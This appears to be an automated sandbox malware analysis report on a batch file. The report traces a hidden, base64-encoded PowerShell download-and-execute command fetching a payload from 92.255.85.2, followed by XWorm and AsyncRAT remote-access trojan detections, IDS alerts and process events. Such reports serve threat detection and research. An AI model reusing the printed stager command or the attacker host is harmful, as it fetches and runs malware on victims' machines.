0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 0a
Source: global traffic | HTTP traffic detected: GET /a.mp4 HTTP/1.1 | Host: 92.255.85.2 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Fox.exe HTTP/1.1 | Host: 92.255.85.2
Source: global traffic | HTTP traffic detected: GET /k.exe HTTP/1.1 | Host: 92.255.85.2
Source: Joe Sandbox View | IP Address: 92.255.85.2
Source: Joe Sandbox View | ASN Name: SOVTEL-ASRU
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49717 -> 92.255.85.2:80
Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49717 -> 92.255.85.2:80
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.85.2
Source: global traffic | HTTP traffic detected: GET /a.mp4 HTTP/1.1 | Host: 92.255.85.2 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Fox.exe HTTP/1.1 | Host: 92.255.85.2
Source: global traffic | HTTP traffic detected: GET /k.exe HTTP/1.1 | Host: 92.255.85.2
Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
Source: powershell.exe, 00000003.00000002.1345688716.0000028919607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891A72D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://92.255.85.2
Source: powershell.exe, 00000003.00000002.1345688716.000002891A9FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://92.255.85.2/Fox.exe
Source: powershell.exe, 00000003.00000002.1345688716.0000028919607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://92.255.85.2/a.mp4
Source: powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://92.255.85.2/k.exe
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000003.00000002.1370438100.0000028931D60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.000002892963D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1345688716.000002891A2D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709

E-Banking Fraud

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==

System Summary

Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, -Module-.cs | Long String: Length: 12184
Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, -Module-.cs | Long String: Length: 12184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFC3DB10DCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_015881D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_01585510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_0158BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_01585DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_0158AE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_015851C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_01580BA0
Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, -Module-.cs Base64 encoded string: (long base64 blob omitted)
Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, -Module-.cs Base64 encoded string: (long base64 blob omitted)
Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.bank.troj.expl.evad.winBAT@10/9@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\58KI5NFirr4xN5IU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svakhwtv.vaj.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: 92.255.85.2.bat Virustotal: Detection: 17%
Source: 92.255.85.2.bat ReversingLabs: Detection: 16%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
